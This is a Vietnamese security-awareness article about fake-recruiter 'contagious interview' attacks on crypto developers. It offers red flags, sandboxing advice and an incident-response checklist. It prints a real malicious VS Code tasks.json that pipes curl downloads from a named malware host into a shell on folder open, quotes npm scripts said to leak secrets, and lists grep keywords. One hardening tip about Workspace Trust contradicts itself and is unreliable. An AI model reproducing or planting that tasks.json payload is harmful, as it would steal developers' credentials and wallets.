Phỏng Vấn Lây Nhiễm: Cách nhà tuyển dụng giả mạo hack lập trình viên
Tóm tắt: Một làn sóng tấn công mới do nhà nước tài trợ đang nhắm vào các nhà phát triển tiền điện tử hàng đầu. Kẻ lừa đảo đóng giả làm nhà tuyển dụng hoặc CTO và ép ứng viên mở mã độc hại. Bài viết này xem xét trường hợp "Martin Erazo", khai thác lỗ hổng "tasks.json" của VS Code và "Giao thức Đốt" cần thiết để tồn tại.
Tuyên bố từ chối trách nhiệm: Bài viết này trích dẫn các sự cố an ninh mạng liên quan đến danh tính giả mạo của người thật. Các tên "Martin Erazo" và "Ara Vartanian" đề cập đến các nhân vật được kẻ tấn công sử dụng. Chúng tôi tin rằng những người thật đứng sau những cái tên này là nạn nhân vô tội của hành vi đánh cắp danh tính.
1. Nạn nhân Hoàn hảo: Nhân vật "Martin Erazo"
Nó bắt đầu bằng một tin nhắn đánh trúng tâm lý của một Senior Dev:
- Vai trò: CTO / Kiến trúc sư trưởng
- Ngân sách: 6 triệu đô la tài trợ đảm bảo
- Công nghệ: Web3, AI, Cơ sở hạ tầng phi tập trung
Trong một cuộc tấn công được xác nhận gần đây, một nhà tuyển dụng tên là "Martin Erazo" liên hệ qua LinkedIn. Hồ sơ sử dụng tên và ảnh của một đạo diễn sân khấu có thật, nhưng lịch sử công việc là giả mạo và đột ngột chuyển sang "Quản lý Dự án CNTT" vào năm 2025 - một dấu hiệu cổ điển của tài khoản bị xâm nhập hoặc bị mua lại.
Vụ lừa đảo diễn ra nhanh chóng. Họ bỏ qua sàng lọc nhân sự thông thường và đi thẳng vào "Phỏng vấn kỹ thuật" với một giám đốc điều hành cấp cao - trong trường hợp này bắt chước CTO thực sự trong ngành Ara Vartanian (hiện tại ở Limit Break).
Cờ Đỏ: Tên dự án liên tục thay đổi. Nhà tuyển dụng bán "Betfin" (nền tảng GameFi), nhưng tài liệu gửi đến lại dành cho "SpaceXView" (dự án Metaverse). Sự không khớp này là manh mối cho thấy những kẻ lừa đảo đang tái sử dụng tài sản giữa các chiến dịch.
2. Cái bẫy: "Bạn có thể xem lại mã MVP của chúng tôi không?"
"CTO" giả nói rằng họ cần con mắt chuyên gia của bạn để kiểm tra cơ sở mã MVP (Sản phẩm khả thi tối thiểu). Họ gửi một liên kết GitHub repo hoặc tệp ZIP và gây áp lực buộc bạn phải mở nó trong cuộc phỏng vấn hoặc ngay sau đó.
Đây là nơi vụ hack xảy ra.
Họ vũ khí hóa sự sẵn lòng giúp đỡ và cái tôi của bạn. Bạn nghĩ rằng mình đang tìm lỗi trong một thành phần React. Trong thực tế, "lỗi" là một "tính năng" được thiết kế để đánh cắp tiền tiết kiệm cả đời của bạn.
3. Xâm nhập Kỹ thuật: Phần mềm độc hại Zero-Click
Kẻ tấn công sử dụng các khai thác "zero-click" hoặc "ít nhấp chuột" nhắm vào các công cụ dành cho nhà phát triển. Bạn không cần chạy ứng dụng; chỉ cần mở thư mục là đủ.
Vũ khí: .vscode/tasks.json
Trong trường hợp cụ thể này, repo chứa một tệp .vscode/tasks.json bị nhiễm độc. Tệp này cho VS Code biết cách xây dựng dự án.
Mã độc hại:
{
"tasks": [
{
"label": "env",
"type": "shell",
"osx": {
"command": "curl -L 'https://vscodesettingtask.vercel.app/api/settings/mac' | bash"
},
"windows": {
"command": "curl --ssl-no-revoke -L https://vscodesettingtask.vercel.app/api/settings/windows | cmd"
},
"runOptions": {
"runOn": "folderOpen"
}
}
]
}
- "runOn": "folderOpen": Đây là trình kích hoạt. Ngay sau khi bạn mở thư mục trong VS Code, tác vụ này sẽ chạy tự động.
- Payload: Sử dụng curl để tải xuống script từ
vscodesettingtask.vercel.app- một máy chủ phần mềm độc hại đã biết mạo danh API cài đặt. - Kết quả: Script chạy trong bộ nhớ và đánh cắp ngay lập tức mật khẩu Chrome, cookie phiên và khóa SSH.
Kế hoạch B: Script package.json
Nếu vụ hack VS Code thất bại, họ có các tập lệnh npm:
"scripts": {
"start": "node server/server.js | react-scripts start",
"prepare": "node server/server.js"
}
Chạy npm install hoặc npm start sẽ kích hoạt server/server.js - một tập lệnh C2 (Ra lệnh và Kiểm soát) cục bộ làm rò rỉ các biến môi trường (khóa AWS, hạt giống ví) cho kẻ tấn công.
4. Cờ Đỏ vs Cờ Xanh
Làm thế nào để phát hiện điều này trước khi quá muộn?
Nếu bạn là nhà phát triển, "Private Repos" (Kho lưu trữ riêng tư) hoặc tệp ZIP sẽ kích hoạt cảnh báo cấp cao. Các công ty hợp pháp sử dụng Kho lưu trữ Cộng đồng hoặc nền tảng kiểm tra tiêu chuẩn hóa.
Cảnh báo: Đây không phải là vectơ tấn công duy nhất chống lại các nhà phát triển. Tìm hiểu về Bẫy Cộng tác viên trong Discord và cách Tấn công Chuỗi cung ứng khiến các phần phụ thuộc trở nên nguy hiểm.
| 🚩 Cờ Đỏ (Chạy ngay) | ✅ Cờ Xanh (An toàn) |
|---|---|
| Mã trước: Gửi mã trước khi đề nghị việc làm | Quy trình chuẩn: Phỏng vấn trước, mã sau |
| Danh tính bị hỏng: Nhà tuyển dụng có quá khứ không liên quan (ví dụ: Nghệ sĩ -> Quản lý CNTT) | Lịch sử đã xác minh: Sự nghiệp LinkedIn nhất quán |
| Không khớp: Tên dự án không khớp (Betfin vs SpaceXView) | Nhất quán: Tên, tài liệu và trang web phù hợp |
| Khẩn cấp: "CTO đang đợi", "mở ngay đi" | Kiên nhẫn: Tôn trọng thời gian và lịch trình của bạn |
| Email cá nhân: [email protected] | Email công ty: [email protected] (với hồ sơ MX đang hoạt động) |
5. Giao thức An ninh: Cách phỏng vấn an toàn
Nếu bạn là Senior Dev, bạn sẽ bị săn đuổi. Việc làm cứng môi trường của bạn là bắt buộc.
Giao thức 1: Môi trường "Dùng một lần" (Burner)
Không bao giờ sử dụng máy trạm chính của bạn để kiểm tra mã.
- Máy ảo: Sử dụng VirtualBox hoặc VMWare.
- Môi trường phát triển đám mây: Sử dụng GitHub Codespaces hoặc Gitpod. Chúng là phù du và bị cô lập khỏi các tệp ví cục bộ của bạn.
Giao thức 2: Kiểm toán Pháp y
Trước khi mở mã của người lạ:
- Kiểm tra .vscode/tasks.json: Tìm
runOn: folderOpen. - Kiểm tra package.json: Tìm các tập lệnh preinstall hoặc postinstall đáng ngờ.
- Từ khóa: grep tìm
curl,wget,os.homedir(),.ssh,wallet.
Giao thức 3: Làm cứng VS Code
Vô hiệu hóa "Workspace Trust" trên toàn cầu.
- Settings -> Security -> Workspace -> Trust: Startup Prompt -> Always
- Điều này buộc VS Code phải xin phép trước khi chạy các tác vụ cấp thư mục.
6. Giải pháp: "Giao thức Đốt" (Burn Protocol)
Nếu bạn đã mở một repo độc hại (như repo mà nhân vật "Martin Erazo" đã gửi), hãy cho rằng bạn đã bị xâm phạm. Đặt lại đơn giản là không đủ.
- Ngắt kết nối: Rút cáp mạng ngay lập tức.
- Đốt ví: Khóa riêng tư của bạn đã bị rò rỉ. Tạo ví mới trên thiết bị sạch (điện thoại) và chuyển số tiền còn lại. Không bao giờ sử dụng lại hạt giống cũ.
- Diệt phiên: Đăng xuất khỏi tất cả các phiên Google, GitHub, AWS. Chủ động thu hồi token.
- Kiểm tra khóa SSH: Kiểm tra cài đặt GitHub/GitLab. Những kẻ tấn công thường thêm khóa SSH của riêng chúng để duy trì quyền truy cập cửa sau. Xóa bất cứ thứ gì bạn không nhận ra.
- Nuke It: Xóa ổ đĩa và cài đặt lại hệ điều hành. Đây là cách duy nhất để chắc chắn 100% rằng rootkit đã biến mất.
Kết luận
Trò lừa đảo "Phỏng vấn Lây nhiễm" sử dụng chuyên môn của chính bạn để chống lại bạn. Nó nhắm vào khát khao giải quyết vấn đề của bạn. Nhưng trong Web3, sự hoang tưởng là một đức tính chuyên nghiệp. Xác minh mọi danh tính, cô lập mọi kho lưu trữ và không bao giờ tin tưởng một "nhà tuyển dụng" đang vội vàng bắt bạn chạy mã.
Sẵn Sàng Áp Dụng Kiến Thức Của Bạn Vào Thực Tế?
Bắt đầu giao dịch được hỗ trợ bởi AI một cách tự tin ngay hôm nay
Bắt ĐầuBài Viết Liên Quan
Nhiễm Độc Chuỗi Cung Ứng (Supply Chain Poison): Khi các bản cập nhật đáng tin cậy trở nên độc hại
Bạn không tải xuống bất cứ thứ gì lạ. Bạn chỉ cập nhật ứng dụng Ledger của mình... Và sau đó tiền biến mất. Sự kinh hoàng của cuộc tấn công chuỗi cung ứng.
Lá Chắn Giấy (The Paper Shield): Cách sao lưu Cụm từ Hạt giống đúng cách
Ảnh chụp màn hình là thảm họa. Đám mây là máy tính của người khác. Cách an toàn duy nhất để lưu trữ khóa riêng tư là 'thép' và 'giấy'.
Trò Lừa Dài Hạn (The Long Con): Tâm lý học đằng sau 'Mổ Lợn'
Cô ấy không nhắn tin nhầm số. Và cô ấy không yêu bạn. Đi sâu vào 'Sha Zhu Pan', trò lừa đảo tiền điện tử tàn bạo nhất, và cách phát hiện kịch bản.